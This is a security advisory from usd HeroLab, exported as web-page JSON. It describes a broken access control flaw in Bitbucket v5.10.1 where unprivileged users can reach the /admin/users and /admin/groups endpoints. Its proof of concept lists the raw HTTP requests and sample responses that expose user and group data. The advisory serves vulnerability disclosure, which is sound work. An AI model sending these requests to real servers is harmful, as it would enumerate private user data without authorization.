{"id":16605,"date":"2021-07-08T11:24:43","date_gmt":"2021-07-08T09:24:43","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0015\/"},"modified":"2021-07-19T14:11:06","modified_gmt":"2021-07-19T12:11:06","slug":"usd-2019-0015","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0015\/","title":{"rendered":"usd-2019-0015"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2019-0015 | Bitbucket\/v5.10.1<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2019-0015<\/span>
CVE Number<\/strong>: N\/A<\/span>
Affected Product<\/strong>: Bitbucket<\/span>
Affected Version<\/strong>: v5.10.1<\/span>
Vulnerability Type<\/strong>: Broken Access Control<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/www.atlassian.com<\/a>
Vendor Status<\/strong>: Not fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

Access control, sometimes called authorization, is how a web application grants access to content and functions to some users and not others. These checks are performed after authentication and govern what \u2018authorized\u2019 users are allowed to do. Access control sounds like a simple task. However, this is insidiously difficult to implement correctly. A web application\u2019s access control model is closely tied to the content and functions that the site provides. In addition, the users may fall into a number of groups or roles with different abilities or privileges.<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept<\/h3>\n

The endpoints \u201e\/admin\/users\u201c and \u201e\/admin\/groups\u201c of an bitbucket instance are located in an administrative section, but can be used by unpriviliged users to request userdata saved by the application:<\/p>\n

Request:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]GET \/ admin\/users?start=0&amp;limit=50&amp;avatarSize=48&amp;filter=usd HTTP\/1.1
\nHost: bitbucket.server
\nConnection: close
\nAccept: application\/json, text\/javascript, *\/*; q=0.01
\nX-Requested-With: XMLHttpRequest
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/72.0.3626.109 Safari\/537.36
\nAccept-Encoding: gzip, deflate
\nAccept-Language: en-US,en;q=0.9
\nCookie: BITBUCKETSESSIONID=A96AF1B941A4D22D49878E2FE1B6F2DD<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

Response:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]HTTP\/1.1 200
\nCache-Control: no-cache, no-transform
\nContent-Type: application\/json;charset=UTF-8
\nDate: Tue, 05 Mar 2019 09:14:38 GMT
\nConnection: close
\nContent-Length: 1849<\/p>\n

{\"size\":4,\"limit\":50,\"isLastPage\":true,\"values\":[{\"name\":\"Nutzerkennung\",\"id\":80947,\"displayName\":\"Usd Pentest 1, Georg\",\"active\":true,\"slug\":\"Nutzerkennung\",\"type\":\"NORMAL\",\"directoryName\":\"Active Directory [\u2026<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

Same access control issue with the \u201egroups\u201c endpoint:<\/p>\n

Request:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]GET \/admin\/groups?start=0&amp;limit=50&amp;filter=usd HTTP\/1.1
\nHost: bitbucket.server
\nConnection: close
\nAccept: application\/json, text\/javascript, *\/*; q=0.01
\nX-Requested-With: XMLHttpRequest
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/72.0.3626.109 Safari\/537.36
\nAccept-Encoding: gzip, deflate
\nAccept-Language: en-US,en;q=0.9
\nCookie: BITBUCKETSESSIONID=A96AF1B941A4D22D49878E2FE1B6F2DD<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

Request:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]HTTP\/1.1 200
\nCache-Control: no-cache, no-transform
\nContent-Type: application\/json;charset=UTF-8
\nDate: Tue, 05 Mar 2019 09:14:38 GMT
\nConnection: close
\nContent-Length: 1849<\/p>\n

{\"size\":2,\"limit\":50,\"isLastPage\":true,\"values\":[{\"name\":\"usd1\",\"deletable\":true},{\"name\":\"usd2\",\"deletable\":true}],\"start\":0}<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

Protect endpoints, which provide sensitive functionalities, with proper access control.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n